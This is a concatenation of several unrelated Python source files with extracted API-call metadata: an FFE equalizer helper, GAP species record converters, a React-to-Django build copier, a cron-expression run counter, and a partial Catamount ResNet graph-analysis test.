0, 0, 0, 0, 0, 0, 0, 20], [41, \n 0, 0, 0, 0, 0, 0, 0, 21], [40, 0, 0, 0, 0, 0, 0, 0, 22], [39, 0, 0, 0, \n 0, 0, 0, 0, 23], [38, 0, 0, 0, 0, 0, 0, 0, 24], [37, 0, 0, 0, 0, 0, 0, \n 0, 25], [36, 0, 0, 0, 0, 0, 0, 0, 26], [35, 34, 33, 32, 31, 30, 29, 28, 27]\n ]'], {}), '([[11, 12, 13, 14, 15, 16, 17, 18, 19], [42, 0, 0, 0, 0, 0, 0, 0, \n 20], [41, 0, 0, 0, 0, 0, 0, 0, 21], [40, 0, 0, 0, 0, 0, 0, 0, 22], [39,\n 0, 0, 0, 0, 0, 0, 0, 23], [38, 0, 0, 0, 0, 0, 0, 0, 24], [37, 0, 0, 0, \n 0, 0, 0, 0, 25], [36, 0, 0, 0, 0, 0, 0, 0, 26], [35, 34, 33, 32, 31, 30,\n 29, 28, 27]])\n', (784, 1097), True, 'import numpy as np\n')] |
from dragonphy import *
import numpy as np
import matplotlib.pyplot as plt
class FFEHelper:
def __init__(self, config, chan, cursor_pos=2, sampl_rate=1e9, t_max=0, iterations=200000, blind=False):
self.config = config
self.channel = chan
self.qc = Quantizer(width=self.config["parameters"]["input_precision"], signed=True)
self.qw = Quantizer(width=self.config["parameters"]["weight_precision"], signed=True)
self.t_max = t_max
self.sampl_rate = sampl_rate
self.cursor_pos = cursor_pos
self.iterations = iterations
self.blind=blind
self.ideal_codes= self.__random_ideal_codes()
self.channel_output = self.__random_codes()
self.quantized_channel_output = self.qc.quantize_2s_comp(self.channel_output)
self.weights = self.calculate_ffe_coefficients(initial=True)
self.filt = self.generate_ffe(self.weights)
def __random_ideal_codes(self):
return np.random.randint(2, size=self.iterations)*2 - 1
def __random_codes(self):
t_delay = -self.t_max + self.cursor_pos/self.sampl_rate
return self.channel.compute_output(self.ideal_codes, f_sig=16e9, t_delay=t_delay)
def randomize_codes(self):
        self.ideal_codes = self.__random_ideal_codes()
        self.channel_output = self.__random_codes()
def calculate_ffe_coefficients(self, mu=0.1, initial=False,blind=None):
        if blind is None:
blind = self.blind
ffe_length = self.config['parameters']['length']
ffe_adapt_mu = 0.1
if initial:
adapt = Wiener(step_size = ffe_adapt_mu, num_taps = ffe_length, cursor_pos=int(ffe_length/2))
else:
adapt = Wiener(step_size = ffe_adapt_mu, num_taps = ffe_length, cursor_pos=int(ffe_length/2), weights=self.weights)
st_idx = self.cursor_pos + int(ffe_length/2)
for i in range(st_idx, self.iterations):
adapt.find_weights_pulse(self.ideal_codes[i-st_idx], self.channel_output[i], blind=blind)
return self.qw.quantize_2s_comp(adapt.weights)
def generate_ffe(self, weights):
return Fir(len(weights), weights, self.config["parameters"]["width"])
def calculate_shift(self):
#The Quantizer can't be used arbitrarily due to its clipping
#Calculate the average maximum value that will occur on the output of the FFE for the given channel
max_val = np.sum(np.abs([round(val/self.qc.lsb) for val in self.filt(self.channel_output)]))/len(self.channel_output)
#Calculate tbe bitwidth (and account for the sign)
val_bitwidth = np.ceil(np.log2(max_val)) + 1 #
out_bitwidth = self.config['parameters']['output_precision']
#Calculate the amount that the FFE output needs to be shifted to avoid overflow
#the +1 is a hedge here
shift = int(val_bitwidth - out_bitwidth) + 1
shift = shift if shift >= 0 else 0
#Calculate the width of the shifter
#the +1 is also a hedge here as well
shift_bitwidth = int(np.ceil(np.log2(shift))) + 1
return shift, shift_bitwidth
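    # Illustrative walk-through of calculate_shift (added; the numbers are
    # hypothetical, not from the original design): with output_precision = 8 and an
    # average maximum FFE output magnitude of ~3500 LSBs, val_bitwidth =
    # ceil(log2(3500)) + 1 = 13, so shift = 13 - 8 + 1 = 6 and
    # shift_bitwidth = ceil(log2(6)) + 1 = 4.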
#Have to add in support for the quantization
| [
"numpy.log2",
"numpy.random.randint"
] | [((979, 1021), 'numpy.random.randint', 'np.random.randint', (['(2)'], {'size': 'self.iterations'}), '(2, size=self.iterations)\n', (996, 1021), True, 'import numpy as np\n'), ((2660, 2676), 'numpy.log2', 'np.log2', (['max_val'], {}), '(max_val)\n', (2667, 2676), True, 'import numpy as np\n'), ((3101, 3115), 'numpy.log2', 'np.log2', (['shift'], {}), '(shift)\n', (3108, 3115), True, 'import numpy as np\n')] |
def gapToTIR(sbItem):
from datetime import datetime
from bis import bis
_gapTaxonomicGroups = {}
_gapTaxonomicGroups["m"] = "mammals"
_gapTaxonomicGroups["b"] = "birds"
_gapTaxonomicGroups["a"] = "amphibians"
_gapTaxonomicGroups["r"] = "reptiles"
sbItem["source"] = "GAP Species"
sbItem["registrationDate"] = datetime.utcnow().isoformat()
sbItem["followTaxonomy"] = False
sbItem["taxonomicLookupProperty"] = "tsn"
for tag in sbItem["tags"]:
if tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/scientificname":
sbItem["scientificname"] = tag["name"]
elif tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/commonname":
sbItem["commonname"] = bis.stringCleaning(tag["name"])
sbItem.pop("tags")
for identifier in sbItem["identifiers"]:
if identifier["type"] == "GAP_SpeciesCode":
sbItem["taxonomicgroup"] = _gapTaxonomicGroups[identifier["key"][:1]]
elif identifier["type"] == "ITIS_TSN":
sbItem["tsn"] = identifier["key"]
return sbItem
# This function is similar to the first one we created for bundling GAP species information from ScienceBase but it flattens the structure to make things simpler for downstream use.
def gapToTIR_flat(sbItem):
from datetime import datetime
from bis import bis
_gapTaxonomicGroups = {}
_gapTaxonomicGroups["m"] = "mammals"
_gapTaxonomicGroups["b"] = "birds"
_gapTaxonomicGroups["a"] = "amphibians"
_gapTaxonomicGroups["r"] = "reptiles"
newItem = {}
newItem["sbdoc"] = sbItem
newItem["source"] = "GAP Species"
newItem["registrationDate"] = datetime.utcnow().isoformat()
newItem["followTaxonomy"] = False
newItem["taxonomicLookupProperty"] = "tsn"
for tag in sbItem["tags"]:
if tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/scientificname":
newItem["scientificname"] = tag["name"]
elif tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/commonname":
newItem["commonname"] = bis.stringCleaning(tag["name"])
for identifier in sbItem["identifiers"]:
newItem[identifier["type"]] = identifier["key"]
if identifier["type"] == "GAP_SpeciesCode":
newItem["taxonomicgroup"] = _gapTaxonomicGroups[identifier["key"][:1]]
return newItem
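# Illustrative usage sketch (added; the record below is a hypothetical, minimal
# ScienceBase item with placeholder identifiers, not real data):
if __name__ == "__main__":
    example_item = {
        "tags": [
            {"scheme": "https://www.sciencebase.gov/vocab/bis/tir/scientificname",
             "name": "Lynx rufus"}
        ],
        "identifiers": [
            {"type": "GAP_SpeciesCode", "key": "mABCDx"},
            {"type": "ITIS_TSN", "key": "123456"}
        ]
    }
    print(gapToTIR_flat(example_item))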
| [
"bis.bis.stringCleaning",
"datetime.datetime.utcnow"
] | [((347, 364), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (362, 364), False, 'from datetime import datetime\n'), ((1692, 1709), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1707, 1709), False, 'from datetime import datetime\n'), ((752, 783), 'bis.bis.stringCleaning', 'bis.stringCleaning', (["tag['name']"], {}), "(tag['name'])\n", (770, 783), False, 'from bis import bis\n'), ((2101, 2132), 'bis.bis.stringCleaning', 'bis.stringCleaning', (["tag['name']"], {}), "(tag['name'])\n", (2119, 2132), False, 'from bis import bis\n')] |
""" Get a react build apps files and move them to django app clearly """
import os, shutil
# configs
STATIC_DIR_PATH = "static"
TEMPLATES_DIR_PATH = "templates"
REACT_APPS_DIR_PATH = "front-end-pages"
TEMPLATE_NAME = "index.html"
STATIC_DIRS = [
'js',
'css',
'media'
]
# end configs
def createBasicDirs():
for dir in STATIC_DIRS:
try:
os.mkdir(os.path.join(STATIC_DIR_PATH, dir))
except FileExistsError:
pass
def copyReactAppsToDjango():
# get apps folder
react_apps = [ path for path in os.listdir(REACT_APPS_DIR_PATH) if os.path.isdir(os.path.join(REACT_APPS_DIR_PATH, path))]
# copy each app to django
for app in react_apps:
build_path = os.path.join(REACT_APPS_DIR_PATH, app, 'build')
if not os.path.exists(build_path):
            raise Exception(
                "\n Build dir doesn't exist" +
                "\n You should run npm run build first!" +
                f"\n App name: {app}" +
                f"\n Build dir path: {build_path}"
            )
build_static_path = os.path.join(build_path, 'static')
# copy files
# template index.html
shutil.copyfile(
os.path.join(build_path, TEMPLATE_NAME),
os.path.join(TEMPLATES_DIR_PATH, f"{app}.html")
)
# static (js, css, media)
for dir in STATIC_DIRS:
dir_path = os.path.join(build_static_path, dir)
django_static_path = os.path.join(STATIC_DIR_PATH, dir)
files = os.listdir(dir_path)
for file in files:
shutil.copyfile(
os.path.join(dir_path, file),
os.path.join(django_static_path, file)
)
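# Expected layout (illustrative summary of the copy logic above):
#   front-end-pages/<app>/build/index.html      -> templates/<app>.html
#   front-end-pages/<app>/build/static/js/*     -> static/js/
#   front-end-pages/<app>/build/static/css/*    -> static/css/
#   front-end-pages/<app>/build/static/media/*  -> static/media/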
def main():
createBasicDirs()
copyReactAppsToDjango()
if __name__ == "__main__":
main()
| [
"os.path.exists",
"os.listdir",
"os.path.join"
] | [((727, 774), 'os.path.join', 'os.path.join', (['REACT_APPS_DIR_PATH', 'app', '"""build"""'], {}), "(REACT_APPS_DIR_PATH, app, 'build')\n", (739, 774), False, 'import os, shutil\n'), ((1086, 1120), 'os.path.join', 'os.path.join', (['build_path', '"""static"""'], {}), "(build_path, 'static')\n", (1098, 1120), False, 'import os, shutil\n'), ((558, 589), 'os.listdir', 'os.listdir', (['REACT_APPS_DIR_PATH'], {}), '(REACT_APPS_DIR_PATH)\n', (568, 589), False, 'import os, shutil\n'), ((790, 816), 'os.path.exists', 'os.path.exists', (['build_path'], {}), '(build_path)\n', (804, 816), False, 'import os, shutil\n'), ((1209, 1248), 'os.path.join', 'os.path.join', (['build_path', 'TEMPLATE_NAME'], {}), '(build_path, TEMPLATE_NAME)\n', (1221, 1248), False, 'import os, shutil\n'), ((1262, 1309), 'os.path.join', 'os.path.join', (['TEMPLATES_DIR_PATH', 'f"""{app}.html"""'], {}), "(TEMPLATES_DIR_PATH, f'{app}.html')\n", (1274, 1309), False, 'import os, shutil\n'), ((1409, 1445), 'os.path.join', 'os.path.join', (['build_static_path', 'dir'], {}), '(build_static_path, dir)\n', (1421, 1445), False, 'import os, shutil\n'), ((1479, 1513), 'os.path.join', 'os.path.join', (['STATIC_DIR_PATH', 'dir'], {}), '(STATIC_DIR_PATH, dir)\n', (1491, 1513), False, 'import os, shutil\n'), ((1534, 1554), 'os.listdir', 'os.listdir', (['dir_path'], {}), '(dir_path)\n', (1544, 1554), False, 'import os, shutil\n'), ((384, 418), 'os.path.join', 'os.path.join', (['STATIC_DIR_PATH', 'dir'], {}), '(STATIC_DIR_PATH, dir)\n', (396, 418), False, 'import os, shutil\n'), ((607, 646), 'os.path.join', 'os.path.join', (['REACT_APPS_DIR_PATH', 'path'], {}), '(REACT_APPS_DIR_PATH, path)\n', (619, 646), False, 'import os, shutil\n'), ((1639, 1667), 'os.path.join', 'os.path.join', (['dir_path', 'file'], {}), '(dir_path, file)\n', (1651, 1667), False, 'import os, shutil\n'), ((1689, 1727), 'os.path.join', 'os.path.join', (['django_static_path', 'file'], {}), '(django_static_path, file)\n', (1701, 1727), False, 'import os, shutil\n')] |
# standard library
import re
from datetime import datetime
from typing import TypeVar
# fakefill plugin
from fakefill.helpers.logging import getLogger
logger = getLogger("cronvert")
Datetime = TypeVar("datetime", bound=datetime)
DAY_NAMES = list(zip(("SUN", "MON", "TUE", "WED", "THU", "FRI", "SAT"), list(range(7))))
MINUTES = (0, 59)
HOURS = (0, 23)
DAYS_OF_MONTH = (1, 31)
MONTHS = (1, 12)
DAYS_OF_WEEK = (0, 6)
L_FIELDS = (DAYS_OF_WEEK, DAYS_OF_MONTH)
FIELD_RANGES = (MINUTES, HOURS, DAYS_OF_MONTH, MONTHS, DAYS_OF_WEEK)
MONTH_NAMES = list(
zip(("JAN", "FEB", "MAR", "APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC"), list(range(1, 13)))
)
DEFAULT_EPOCH = (1970, 1, 1, 0, 0, 0)
SUBSTITUTIONS = {
"@yearly": "0 0 1 1 *",
"@annually": "0 0 1 1 *",
"@monthly": "0 0 1 * *",
"@weekly": "0 0 * * 0",
"@daily": "0 0 * * *",
"@midnight": "0 0 * * *",
"@hourly": "0 * * * *",
}
VALIDATE_POUND = re.compile("^[0-6]#[1-5]")
VALIDATE_L_IN_DOW = re.compile("^[0-6]L$")
VALIDATE_W = re.compile("^[0-3]?[0-9]W$")
def cron_counts(cronexpr: str) -> int:
try:
return __CronToMonthly__(cronexpr)()
except Exception:
logger.warning(f"Cannot parse cron expression: {cronexpr}. Using default value: 30")
return 30
class __CronToMonthly__:
def __init__(self, line: str, epoch=DEFAULT_EPOCH, epoch_utc_offset: int = 0):
"""
Instantiates a CronExpression object with an optionally defined epoch.
If the epoch is defined, the UTC offset can be specified one of two
ways: as the sixth element in 'epoch' or supplied in epoch_utc_offset.
The epoch should be defined down to the minute sorted by
descending significance.
"""
self.compute_epoch(line, epoch=DEFAULT_EPOCH, epoch_utc_offset=0)
    def __call__(self) -> int:
        """ This method only calculates an approximate upper limit.
            A crontab like `* 8 1 * Sun` is rounded up to "every minute past hour 8 on the first day of month",
            i.e. the weekday field is dropped whenever a day-of-month is given.
            Range -> 0 <= base_unit <= 1440 per day
"""
minute, hour, day, _, _ = self.numerical_tab
# Get execution times
count_min = len(minute)
count_hour = len(hour)
count_day = len(day)
base_unit = 1
daily_unit = 1
base_unit *= count_min if count_min else base_unit
base_unit *= count_hour if count_hour else base_unit
daily_unit = base_unit
base_unit *= count_day if count_day else base_unit
return base_unit, daily_unit
def __repr__(self):
base = self.__class__.__name__ + "(%s)"
cron_line = self.string_tab + [str(self.comment)]
if not self.comment:
cron_line.pop()
arguments = '"' + " ".join(cron_line) + '"'
if self.epoch != DEFAULT_EPOCH:
return base % (arguments + ", epoch=" + repr(self.epoch))
else:
return base % arguments
def __str__(self):
return repr(self)
def compute_epoch(self, line: str, epoch=DEFAULT_EPOCH, epoch_utc_offset: int = 0):
for key, value in list(SUBSTITUTIONS.items()):
if line.startswith(key):
line = line.replace(key, value)
break
fields = line.split(None, 5)
if len(fields) == 5:
fields.append("")
minutes, hours, dom, months, dow, self.comment = fields
dow = dow.replace("7", "0").replace("?", "*")
dom = dom.replace("?", "*")
for monthstr, monthnum in MONTH_NAMES:
months = months.upper().replace(monthstr, str(monthnum))
for dowstr, downum in DAY_NAMES:
dow = dow.upper().replace(dowstr, str(downum))
self.string_tab = [minutes, hours, dom, months, dow]
self.compute_numtab()
if len(epoch) == 5:
y, mo, d, h, m = epoch
self.epoch = (y, mo, d, h, m, epoch_utc_offset)
else:
self.epoch = epoch
def compute_numtab(self):
"""
Recomputes the sets for the static ranges of the trigger time.
This method should only be called by the user if the string_tab
member is modified.
"""
self.numerical_tab = []
for field_str, span in zip(self.string_tab, FIELD_RANGES):
split_field_str = field_str.split(",")
if len(split_field_str) > 1 and "*" in split_field_str:
raise ValueError('"*" must be alone in a field.')
unified = set()
for cron_atom in split_field_str:
# parse_atom only handles static cases
if not (is_special_atom(cron_atom, span)):
unified.update(parse_atom(cron_atom, span))
self.numerical_tab.append(unified)
if self.string_tab[2] == "*" and self.string_tab[4] != "*":
self.numerical_tab[2] = set()
elif self.string_tab[4] == "*" and self.string_tab[2] != "*":
self.numerical_tab[4] = set()
def is_special_atom(cron_atom, span):
"""
Returns a boolean indicating whether or not the string can be parsed by
parse_atom to produce a static set. In the process of examining the
string, the syntax of any special character uses is also checked.
"""
for special_char in ("%", "#", "L", "W"):
if special_char not in cron_atom:
continue
if special_char == "#":
if span != DAYS_OF_WEEK:
raise ValueError('"#" invalid where used.')
elif not VALIDATE_POUND.match(cron_atom):
raise ValueError('"#" syntax incorrect.')
elif special_char == "W":
if span != DAYS_OF_MONTH:
raise ValueError('"W" syntax incorrect.')
elif not (VALIDATE_W.match(cron_atom) and int(cron_atom[:-1]) > 0):
raise ValueError('Invalid use of "W".')
elif special_char == "L":
if span not in L_FIELDS:
raise ValueError('"L" invalid where used.')
elif span == DAYS_OF_MONTH:
if cron_atom != "L":
raise ValueError('"L" must be alone in days of month.')
elif span == DAYS_OF_WEEK:
if not VALIDATE_L_IN_DOW.match(cron_atom):
raise ValueError('"L" syntax incorrect.')
elif special_char == "%":
if not (cron_atom[1:].isdigit() and int(cron_atom[1:]) > 1):
raise ValueError('"%" syntax incorrect.')
return True
else:
return False
def parse_atom(parse, minmax):
"""
Returns a set containing valid values for a given cron-style range of
numbers. The 'minmax' arguments is a two element iterable containing the
inclusive upper and lower limits of the expression.
Examples:
>>> parse_atom("1-5",(0,6))
set([1, 2, 3, 4, 5])
>>> parse_atom("*/6",(0,23))
set([0, 6, 12, 18])
>>> parse_atom("18-6/4",(0,23))
set([18, 22, 0, 4])
>>> parse_atom("*/9",(0,23))
set([0, 9, 18])
"""
parse = parse.strip()
increment = 1
if parse == "*":
return set(range(minmax[0], minmax[1] + 1))
elif parse.isdigit():
# A single number still needs to be returned as a set
value = int(parse)
if value >= minmax[0] and value <= minmax[1]:
return set((value,))
else:
raise ValueError('"%s" is not within valid range.' % parse)
elif "-" in parse or "/" in parse:
divide = parse.split("/")
subrange = divide[0]
if len(divide) == 2:
# Example: 1-3/5 or */7 increment should be 5 and 7 respectively
increment = int(divide[1])
if "-" in subrange:
# Example: a-b
prefix, suffix = [int(n) for n in subrange.split("-")]
if prefix < minmax[0] or suffix > minmax[1]:
raise ValueError('"%s" is not within valid range.' % parse)
elif subrange.isdigit():
# Handle offset increments e.g. 5/15 to run at :05, :20, :35, and :50
return set(range(int(subrange), minmax[1] + 1, increment))
elif subrange == "*":
# Include all values with the given range
prefix, suffix = minmax
else:
raise ValueError('Unrecognized symbol "%s"' % subrange)
if prefix < suffix:
# Example: 7-10
return set(range(prefix, suffix + 1, increment))
else:
# Example: 12-4/2; (12, 12 + n, ..., 12 + m*n) U (n_0, ..., 4)
noskips = list(range(prefix, minmax[1] + 1))
noskips += list(range(minmax[0], suffix + 1))
return set(noskips[::increment])
else:
raise ValueError('Atom "%s" not in a recognized format.' % parse)
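# Illustrative expected values (added; derived from the parsing logic above, not
# part of the original module). Note that on success cron_counts returns a
# (runs_per_month, runs_per_day) tuple despite its `-> int` annotation:
#   cron_counts("0 8 1 * *")     -> (1, 1)      one run on the 1st, at most one per day
#   cron_counts("0 8 * * *")     -> (31, 1)     one run per day over the 31 day-of-month slots
#   cron_counts("*/15 * * * *")  -> (2976, 96)  96 runs per day times 31 day-of-month slots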
| [
"re.compile",
"fakefill.helpers.logging.getLogger",
"typing.TypeVar"
] | [((162, 183), 'fakefill.helpers.logging.getLogger', 'getLogger', (['"""cronvert"""'], {}), "('cronvert')\n", (171, 183), False, 'from fakefill.helpers.logging import getLogger\n'), ((196, 231), 'typing.TypeVar', 'TypeVar', (['"""datetime"""'], {'bound': 'datetime'}), "('datetime', bound=datetime)\n", (203, 231), False, 'from typing import TypeVar\n'), ((940, 966), 're.compile', 're.compile', (['"""^[0-6]#[1-5]"""'], {}), "('^[0-6]#[1-5]')\n", (950, 966), False, 'import re\n'), ((987, 1009), 're.compile', 're.compile', (['"""^[0-6]L$"""'], {}), "('^[0-6]L$')\n", (997, 1009), False, 'import re\n'), ((1023, 1051), 're.compile', 're.compile', (['"""^[0-3]?[0-9]W$"""'], {}), "('^[0-3]?[0-9]W$')\n", (1033, 1051), False, 'import re\n')] |
import argparse
import numpy as np
import os
import pickle
import sympy
import sys
sys.setrecursionlimit(50000)
from catamount.api import utils
import catamount.frameworks.tensorflow
from catamount.ops.constant import *
from catamount.ops.variable import *
from catamount.ops.math_ops import MaximumOp
is_pytest_run = False
def test_tf_image_resnet_18():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=18, filter_scale=1.0)
def test_tf_image_resnet_34():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=34, filter_scale=1.0)
def test_tf_image_resnet_50():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=50, filter_scale=1.0)
def test_tf_image_resnet_101():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=101, filter_scale=1.0)
def test_tf_image_resnet_152():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=152, filter_scale=1.0)
def run_tf_image_resnet(depth, filter_scale=1.0):
global is_pytest_run
model_string = '_d{}_fs{}_'.format(depth, filter_scale)
test_outputs_dir = 'catamount/frameworks/example_graphs/tensorflow/full_models/image_classification'
graph_meta = None
for root, dirs, files in os.walk(test_outputs_dir):
for filename in files:
if 'graph{}'.format(model_string) in filename and '.meta' in filename:
# Take the first graph that we find in the directory
graph_meta = os.path.join(root, filename)
break
if graph_meta is not None:
break
if graph_meta is None:
raise FileNotFoundError('Unable to find model string {} in directory {}'
.format(model_string, test_outputs_dir))
graph = catamount.frameworks.tensorflow.import_graph(graph_meta)
assert graph.isValid()
# Manually remove the inference parts of graph
graph_ops = list(graph._ops_by_name.values())
for op in graph_ops:
# Certain ops are only used for inference
if 'InferenceTower/' in op.name or \
'InferenceRunner/' in op.name or \
op.name == 'MergeAllSummariesRunWithOp/Merge/MergeSummary':
graph.removeOp(op)
assert graph.isValid()
print('Initial graph:\n{}\n'.format(graph))
init_params = graph.calcModelParameters()
print('Initial parameters: {}'.format(init_params))
print('Initial Flops: {}\n'.format(graph.calcAlgFlops()))
print('Placeholders:')
for op in graph.getPlaceholders():
print(op.debugString())
print('')
# Set up symbols to name dimensions
output_classes_symbol = utils.getPositiveIntSymbolFromString('out_classes')
subbatch_size_symbol = utils.getPositiveIntSymbolFromString('subbatch_size')
image_height_symbol = utils.getPositiveIntSymbolFromString('image_height')
image_width_symbol = utils.getPositiveIntSymbolFromString('image_width')
num_in_channels_symbol = utils.getPositiveIntSymbolFromString('num_in_channels')
graph_iters_symbol = utils.getIntSymbolFromString('graph::iters')
feature_channels_symbol = utils.getPositiveIntSymbolFromString('feature_channels')
# Find and replace convolution/pooling dimensions also:
# Dimension(64 * 2^k): conv/pool feature channels
base_output_classes = 1000
base_num_in_channels = 3
base_feature_channels = 64
base_image_height = 224
base_image_width = 224
base_half_im_height = 112
half_im_height_symbol = image_height_symbol // 2
base_half_im_width = 112
half_im_width_symbol = image_width_symbol // 2
base_quart_im_height = 56
quart_im_height_symbol = (image_height_symbol // 2) // 2
base_quart_im_width = 56
quart_im_width_symbol = (image_width_symbol // 2) // 2
base_eighth_im_height = 28
eighth_im_height_symbol = ((image_height_symbol // 2) // 2) // 2
base_eighth_im_width = 28
eighth_im_width_symbol = ((image_width_symbol // 2) // 2) // 2
base_sixtnth_im_height = 14
sixtnth_im_height_symbol = (((image_height_symbol // 2) // 2) // 2) // 2
base_sixtnth_im_width = 14
sixtnth_im_width_symbol = (((image_width_symbol // 2) // 2) // 2) // 2
base_small_im_height = 7
small_im_height_symbol = ((((image_height_symbol // 2) // 2) // 2) // 2) // 2
base_small_im_width = 7
small_im_width_symbol = ((((image_width_symbol // 2) // 2) // 2) // 2) // 2
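    # (added note) Example of the symbolic rewriting performed below: with the
    # defaults, small_im_height_symbol resolves to 224//2//2//2//2//2 = 7, matching
    # base_small_im_height, and a conv weight with 256 output filters is rebound to
    # (256 // base_feature_channels) * feature_channels_symbol = 4*feature_channels_symbol.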
# TODO (Joel): Add InputQueue ops to avoid manually setting dimensions
in_deque_op = graph.opsByName['QueueInput/input_deque']
# print(in_deque_op.debugString())
out_tensor = in_deque_op._outputs[0]
for idx, sym in enumerate([subbatch_size_symbol, image_height_symbol, image_width_symbol, num_in_channels_symbol]):
out_tensor.shape.setDimension(idx, sym)
out_tensor.shape.dims[idx]._value = None
out_tensor = in_deque_op._outputs[1]
out_tensor.shape.setDimension(0, subbatch_size_symbol)
# Set up a dictionary of placeholders and variables for which we want
# to make dimensions symbolic. Sift out their dimensions
bind_dict = { # Placeholders
'label': [subbatch_size_symbol],
'input': [subbatch_size_symbol, image_height_symbol, image_width_symbol, num_in_channels_symbol],
}
# Parameterize all variable tensor dimensions
for op in graph._ops_by_name.values():
if isinstance(op, VariableOp):
op_name_suffix = op.name.split('/')[-1]
if op_name_suffix == 'W':
if op._outputs[0].shape.rank == 4:
assert 'conv' in op.name
new_shape = []
for i in range(op._outputs[0].shape.rank):
new_shape.append(op._outputs[0].shape.getDimension(i).value)
if new_shape[2] % base_feature_channels == 0:
in_filters = (new_shape[2] // \
base_feature_channels) * \
feature_channels_symbol
elif new_shape[2] == 3:
# This is the first convolution on image channels (3)
assert op.name == 'conv0/W'
in_filters = num_in_channels_symbol
else:
print('FIX ME: base in filters {}'.format(new_shape[2]))
assert 0
if new_shape[3] % base_feature_channels == 0:
out_filters = (new_shape[3] // \
base_feature_channels) * \
feature_channels_symbol
else:
print('FIX ME: base out filters {}'.format(new_shape[3]))
assert 0
new_shape[2] = in_filters
new_shape[3] = out_filters
else:
# This is the output layer with output_classes dimension
assert op.name == 'linear/W'
assert op._outputs[0].shape.rank == 2
in_dim = op._outputs[0].shape.getDimension(0).value
assert in_dim % base_feature_channels == 0
in_dim = (in_dim // base_feature_channels) * \
feature_channels_symbol
new_shape = [in_dim, output_classes_symbol]
bind_dict[op.name] = new_shape
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
elif op_name_suffix == 'b':
# This is the output layer with output_classes dimension
assert op.name == 'linear/b'
assert op._outputs[0].shape.rank == 1
assert op._outputs[0].shape.getDimension(0).value == \
base_output_classes
new_shape = [output_classes_symbol]
bind_dict[op.name] = new_shape
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
elif op_name_suffix == 'beta' or op_name_suffix == 'gamma' or \
op_name_suffix == 'EMA':
assert op._outputs[0].shape.rank == 1
in_dim = op._outputs[0].shape.getDimension(0).value
assert in_dim % base_feature_channels == 0
in_dim = (in_dim // base_feature_channels) * \
feature_channels_symbol
new_shape = [in_dim]
bind_dict[op.name] = new_shape
if op_name_suffix != 'EMA':
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
# Now handle constant values in the graph
const_dict = {}
for op in graph._ops_by_name.values():
if isinstance(op, ConstantOp):
if op._outputs[0].value is None:
continue
if op._outputs[0].shape.rank == 0:
print('{}'.format(op.debugString()))
continue
assert op._outputs[0].shape.rank == 1
values = op._outputs[0].value.tolist()
new_values = []
changed = False
for value in values:
if value > 0 and value % base_feature_channels == 0:
value = (value // base_feature_channels) * feature_channels_symbol
changed = True
new_values.append(value)
# HACKY SPECIAL CASE:
if op.name == 'tower0/gradients/tower0/conv0/Conv2D_grad/Const':
assert new_values[2] == base_num_in_channels
new_values[2] = num_in_channels_symbol
if changed:
const_dict[op.name] = new_values
graph.bindConstantValues(const_dict)
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
# Nice little hack to actually propagate MaximumOp values to outputs
for op in graph._ops_by_name.values():
if isinstance(op, MaximumOp):
if op._inputs[0].value is not None and \
op._inputs[1].value is not None:
vmax = np.vectorize(lambda x, y: sympy.Max(x, y))
out_val = vmax(op._inputs[0].value, op._inputs[1].value)
op._outputs[0].setValue(out_val)
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
print('Bound values')
print(graph)
bind_subs = {
graph_iters_symbol: 1,
output_classes_symbol: base_output_classes,
subbatch_size_symbol: 32,
image_height_symbol: base_image_height,
image_width_symbol: base_image_width,
num_in_channels_symbol: base_num_in_channels,
feature_channels_symbol: base_feature_channels,
}
correct_params = -1
correct_flops = -1
correct_bytes = -1
correct_footprint = -1
if depth == 18:
correct_params = 11689514
correct_flops = 349684163360
correct_bytes = 7186222676
correct_footprint = 2802084304
elif depth == 34:
correct_params = 21797674
correct_flops = 705506994208
correct_bytes = 11162578644
correct_footprint = 4368689744
elif depth == 50:
correct_params = 25557034
correct_flops = 790954958112
correct_bytes = 32896462028
correct_footprint = 12909734408
elif depth == 101:
correct_params = 44549162
correct_flops = 1506507229472
correct_bytes = 50026672916
correct_footprint = 19690293072
elif depth == 152:
correct_params = 60192810
correct_flops = 2222688328992
correct_bytes = 70967716188
correct_footprint = 27971880088
else:
print('WARN: Tests not defined for depth {}'.format(depth))
# Calculate parameters
# NOTE: Need to remove Momentum optimizer parameters and moving average values
momentum_params = 0
parameters = 0
for op_name in sorted(graph.opsByName.keys()):
op = graph.opsByName[op_name]
if isinstance(op, VariableOp):
if "Momentum" in op.name or "EMA" in op.name:
momentum_params += op.calcModelParameters()
else:
parameters += op.calcModelParameters()
all_weights = graph.calcModelParameters()
assert (all_weights - momentum_params - parameters) == 0
# Calculate model parameter count
resolved_params = parameters.subs(bind_subs)
try:
resolved_params = int(resolved_params)
except:
print('ERROR: resolved_params should be int, but is {} = {}'.format(
type(resolved_params), resolved_params))
assert correct_params < 0 or resolved_params == correct_params, \
'Incorrect model params: {}'.format(resolved_params)
print('Parameters: {}\nWith specified dims: {}\n'.format(parameters, resolved_params))
# Calculate algorithmic Flops
alg_flops = graph.calcAlgFlops()
resolved_flops = alg_flops.subs(bind_subs)
try:
resolved_flops = int(resolved_flops)
except:
print('ERROR: resolved_flops should be int, but is {} = {}'.format(
type(resolved_flops), resolved_flops))
assert correct_flops < 0 or resolved_flops == correct_flops, \
'Incorrect algorithmic flops: {}'.format(resolved_flops)
